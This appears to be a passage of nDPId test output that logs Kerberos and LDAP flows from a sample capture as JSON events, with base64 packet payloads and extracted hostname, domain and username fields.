+00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1549337937690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937690,"pkt":"pB9ywglqAAgCHEeuCABFAAEyAM1AAIAGkAesEAjJrBAICMAbAYXq\/lHZFzDO61AYAQB3VwAADK3yhyWG\/w4ePjAcLdmQD9l5KJpA6NxzQuCtaFM+te5CWXRB5sUkdKJyUVp4kqyFJvIav1zvlLEwv\/M6QDvIyPip6cO\/Y7DDZ55OmD6IlKO8Nx5lANmfdaxcK4l74ZAlM45v2cQu8OV3yuWKq5L2jtnHunCltg9I9Mqjq93VmxUc7poK8vfSfY1YgBhAmlp0cXMsoyIbcEQodelj3wLBZ2oxItwV78GGNt7TlfW6joQ5wfkj6ZEyRFJn0CVihbNqYYKxBD44uauIJQKkPsQlzXsxooh9lhiWoZtuh5F2\/1LO7drek9zYg6pqUFpyhpL3WcFxh3R7Uuv9RQ5CYfOoVItdeOxn2w53bU0="} 
+00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1549337937691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937691,"pkt":"AAgCHEeupB9ywglqCABFAAD6E5tAAIAGfXGsEAgIrBAIyQGFwBsXMM7r6v5S41AYAQDOWAAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1JH5VWFTlwrbTZZZgbjZtW4QY+VaIr2rFT9\/AbDkv31Idx3xo24Bwzqv50t5zQXx7Id1H\/iLYt+nRqN0NWzCDJwnAfwcbOTGF30f3qnaqB+vDQ9EhQX38cpSy926C3lIc0Vkhc+VaaHdh510+B"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937700,"flow_last_seen":1549337937700,"flow_idle_time":7560000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937700,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1549337937700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937700,"pkt":"pB9ywglqAAgCHEeuCABFAAEyANVAAIAGj\/+sEAjJrBAICMAcAYWCU2zwSN6TcFAYAQDS2QAAEgduSF05n8MFVjy4LWbkIsui7POF\/jI0fgAi3\/kn4+lZJrv4uo1Xj0IHKshBaLfyrICuzZtbBAFYjLvQz7y8gyRTfkwzadmnUFntTq1Eam1s4n2Qhfn1fuSUa5DAR1i941DEujmYu8fTZX3tp1hllqkxXisHcqSEIi8W9weLGXgpYEZYoErMkYejHKEeDmPCwQO6JC7sDmP8cAErQb7Rc88wLF4lFI7xOIE4FiH\/05afA1w9V5d1P2yDaGB6bADs\/c2xi7QKQuP+FixF4gof0ovK0nwq\/y7Hd27V4SQ4qHRNlXJex92QoEPhio00QFq1bLTnuvdcqFYcMu\/6\/tRVEcFKp0ezr7WF5MI="} +00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1549337937701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937701,"pkt":"AAgCHEeupB9ywglqCABFAAD6E6JAAIAGfWqsEAgIrBAIyQGFwBxI3pNwglNt+lAYAQCvQgAAMIQAAADMAgEKYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG2EupGhqTVA+Kxm5vIdkbfFjlPoe8DmjpF\/p2I3j7EwFjqQzavz5jy+cGzZKn09a9y0dyj\/mpeHcqpjjORB3KYfxKGHrDmiKKSYiCwqx86ee7rLKiQPX2z3RSwNa4fWz8uAjgw+I5CkXYbP6rNu"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337937703,"pkt":"pB9ywglqAAgCHEeuCABFAAEXANlAAIAGkBasEAjJrBAICMAdAFjHhcaiuhdcXlAYAQCv5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBFIcW1KoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} +00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337937703,"pkt":"AAgCHEeupB9ywglqCABFAAE+E6VAAIAGfSOsEAgIrBAIyQBYwB26F1xex4XHkVAYAQDp0AAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg1NlqlBQIDBJWNpgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} +00731{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337937724,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAN1AAIAGj8KsEAjJrBAICMAeAFgo\/29go\/Vk0VAYAQAVQgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4EwWkoanvLUiVA5eu8uG72\/EPy4+eHAiK9HbftleuqZ7DwBR\/wY3Sc5USTXPr6SJXdlLH8zfIE5MwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLSk9ITlNPTi1QQySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEUhxbUqgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} 
+00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337937724,"pkt":"AAgCHEeupB9ywglqCABFAACYE6pAAIAGfcSsEAgIrBAIyQBYwB6j9WqFKP9wn1AYAQCbeQAAeBxjGZR555TmhlGtfWdB3hqYo6lYswe6vKpNUcrN1M7KGcxMIdPLYhZ04dECjGI6ypolTWuvt884Bi2lq0pIFbZFVKD3x\/BnUesSWAB9L0qg+5NPzwAEggckaZSGKHdd5sXD0ux4MNvoyw986qY1Nw=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937725,"flow_last_seen":1549337937725,"flow_idle_time":7560000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":1,"thread_ts_msec":1549337937725,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1549337937725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1549337937725,"pkt":"pB9ywglqAAgCHEeuCABFAAB4AONAAIAGkKusEAjJrBAICMAfAFi1TK\/3YmHJT1AYAQDj2wAAbj2wbk+derrxO0c0pxRSdruhR6\/j4Ui\/xNsBa8OfbfRkbAwdywbQynHUORFcFH8maukxsoLa+OhvD2a5+zDPKPlneJ\/sg2b\/GuIvr5ZD3Bg="} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1549337937726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1549337937726,"pkt":"AAgCHEeupB9ywglqCABFAABQE7BAAIAGfgasEAgIrBAIyQBYwB9iYc8DtUywR1AYAQDGTwAA4zLECSz5GZPNqNSL4T5BMx8WrZoQ8TiJymulR2VkZN3O1rD+5YXABg=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940431,"flow_last_seen":1549337940431,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337940431,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1549337940431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337940431,"pkt":"pB9ywglqAAgCHEeuCABFAACxAPpAAIAGkFusEAjJrBAICMAiAFjJGNiQqlyd6VAYAQDPPQAAiJisSNul39yNkXIaZ7I9abKKHsFn\/6nUnlpuYlwP2aMvOAIHPA5TwBaAhiWq+tFyYupNZpDDILw6OTtdBUx9AScUIqcHtp8iuHt0kMVzTn\/4u2MWOJ3B5oBzCaRbB4JGSnxRjDJCJirb6nGFgBI0LOLujBAlXiGb5mYfdXtWDkYlEBJfjMNCAaw="} +00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337940432,"pkt":"AAgCHEeupB9ywglqCABFAACbE79AAIAGfaysEAgIrBAIyQBYwCKqXKOdyRjZGVAYAQDDTwAAKYg87lVL35oh62EWNwE864\/2bfnOQr1tnnHZbVGEslhqWgqxgOlP8fU7tCl8Q\/Pa+OiAoCN8WQQSqJd8h73HLCORGVTkV2\/0V8MyUM0yQH1SL9l7PdXJm7IP\/IVn+E9KcR0nyC\/qPtxkWFJAw4YHnIb0GQ=="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940432,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"flow_min_l4_payload_len":359,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":359,"midstream":1,"thread_ts_msec":1549337940432,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00936{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":413,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":413,"pkt_l4_len":379,"thread_ts_msec":1549337940432,"pkt":"pB9ywglqAAgCHEeuCABFAAGPAP5AAIAGj3msEAjJrBAICMAhwAMZWxyAQJkJXFAYAQAR1wAA1H5mUL0BcI4qPWGkggFYMIIBVKADAgESooIBSwSCAUcbieRVkdOtAnzmcyqLDK9HyZo8H6AcRFkR6nkpd0sYlEbV82Qt31YdF5lIivhvCiptxoXnMPhE44z2QYycXFRvcJlMUVHmYJTlGAPASSmrxcFRtfwGd3CmxLGHH6gdXYYGgEzOmFuOyHJjprxX+WUkbubIb9DuIaCyGfu6WjSvDsJsxl8APFvUDVpwKCBx+yi4Nl7uparYkV7uyBIsOfius8LRX8aNw6uyL8Rg7Kcy+u\/AdDO7DcqqeIW4ECzaDnKuMDvhoDG1L4DC3Gyq10cUmszgrrBDkGwYBF3I07gVPaOITvdzOarlv0eTNHIPNCN07gmcrX\/ElHpPLwV7ZiI5SB1SY8Op3qesfZqAIqjOBGiyQU2+uy5qrSSffZHU9iojHh1BosRxcA7pQ15VJkC0LtUsgQyMbCX0W85YmDAFmZqe2ZivqK8="} +00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337940433,"pkt":"AAgCHEeupB9ywglqCABFAAFEE8NAAIAGfP+sEAgIrBAIycADwCFAmQlcGVsd51AYAQDbOQAABQAMBxAAAAAcAagAAgAAANAW0BaIIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8Ebfn2lEYLCMVIVfFxnfrMpLLQ5jje4X2obHkLE1mHLBb3QYmIfBpDW5VyIgGbPY54D9aSU3VouXp90Sdg8ibesBCnHqUH+HJX\/hdQ0brTNgFSTOR\/m3sdIfIuZmQkzV3dPMC5PlxnwhbW8ZWYvQE="} 
+00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337940433,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAP9AAIAGkAOsEAjJrBAICMAhwAMZWx3nQJkKeFAYAP\/gGgAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBELB6nut18jCMG03H8TJyLvCf8wWF6F7BqJ4bg85nSMTOiCmzGy+a5tNrq0VYdAt2TCIZ2p1Ys\/DpnWvcPxOp0LCSoajHgQcBAQE\/\/\/\/\/\/8AAAAAVL504MDCo+3fnXZuQhY33A=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1549337951630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1549337951630,"pkt":"pB9ywglqAAgCHEeuCABFAAETAQ1AAIAGj+asEAjJrBAICMAjAFj9jJo6lSyMo1AYAQB4vAAAAAAA52qB5DCB4aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBvTCBuqAHAwUAQIEAEKEcMBqgAwIBAaETMBEbD3RoZXJlc2Euam9obnNvbqIMGwpIQVBQWUNSQUZUox8wHaADAgECoRYwFBsGa3JidGd0GwpIQVBQWUNSQUZUpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEXdv8Z6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} +00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 
+00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1549337951631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1549337951631,"pkt":"AAgCHEeupB9ywglqCABFAAEYE9dAAIAGfResEAgIrBAIyQBYwCOVLIyj\/YybJVAYAQAREAAAAAAA7H6B6TCB5qADAgEFoQMCAR6kERgPMjAxOTAyMDUwMzM5MTBapQUCAwNKZqYDAgEZqQwbCkhBUFBZQ1JBRlSqHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSsgYsEgYgwgYUwYqEDAgETolsEWTBXMCagAwIBEqEfGx1IQVBQWUNSQUZULk9SR3RoZXJlc2Euam9obnNvbjAFoAMCARcwJqADAgEDoR8bHUhBUFBZQ1JBRlQuT1JHdGhlcmVzYS5qb2huc29uMAmhAwIBAqICBAAwCaEDAgEQogIEADAJoQMCAQ+iAgQA"} +00732{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337951631,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1549337951638,"pkt":"pB9ywglqAAgCHEeuCABFAAFjARFAAIAGj5KsEAjJrBAICMAkAFi0GLZOsNNMHlAYAQAvMAAAAAABN2qCATMwggEvoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4Wndh9xw8qUUtso0vc8TuP9R5peLYlUKrIi93QkMXsrfVII\/B8UhLSOwTSHwq5LSHP2vURJP\/YpgwEaEEAgIAgKIJBAcwBaADAQH\/pIG9MIG6oAcDBQBAgQAQoRwwGqADAgEBoRMwERsPdGhlcmVzYS5qb2huc29uogwbCkhBUFBZQ1JBRlSjHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSlERgPMjAzNzA5MTMwMjQ4MDVaphEYDzIwMzcwOTEzMDI0ODA1WqcGAgRd2\/xnqBUwEwIBEgIBEQIBFwIBGAIC\/3kCAQOpHTAbMBmgAwIBFKESBBBKT0hOU09OLVBDICAgICAg"} 
+00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 